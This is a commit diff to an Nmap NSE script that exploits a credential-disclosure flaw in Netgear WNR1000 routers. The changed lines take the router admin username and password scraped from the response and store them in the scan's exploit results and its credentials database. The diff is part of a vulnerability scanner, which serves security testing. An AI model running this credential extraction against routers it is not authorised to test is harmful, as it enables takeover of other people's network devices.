Report and record recovered creds in http-vuln-wnr1000-creds

2025-12-06 04:31:29 +00:00 · 2017-03-24 16:20:02 +00:00
parent 3220cbd62b
commit 312fbbfcf1
1 changed files with 8 additions and 3 deletions
--- a/scripts/http-vuln-wnr1000-creds.nse
+++ b/scripts/http-vuln-wnr1000-creds.nse
@@ -3,6 +3,7 @@ local shortport = require "shortport"
 local stdnse = require "stdnse"
 local string = require "string"
 local vulns = require "vulns"
+local creds = require "creds"

 description = [[
 A vulnerability has been discovered in WNR 1000 series that allows an attacker
@@ -85,8 +86,12 @@ action = function(host, port)
                local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin')
                local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText')
                if (netgear_username ~= nil and netgear_password ~= nil) then
-                    stdnse.debug1("username : %s", escape(netgear_username))
-                    stdnse.debug1("password : %s", escape(netgear_password))
+                  vuln.exploit_results = {
+                    ("username: %s"):format(netgear_username),
+                    ("password: %s"):format(netgear_password),
+                  }
+                  local c = creds.Credentials:new(SCRIPT_NAME, host, port)
+                  c:add(netgear_username, netgear_password, creds.State.VALID)
                  vuln.state = vulns.STATE.VULN
                else
                    stdnse.debug1("We haven't been able to get username/password")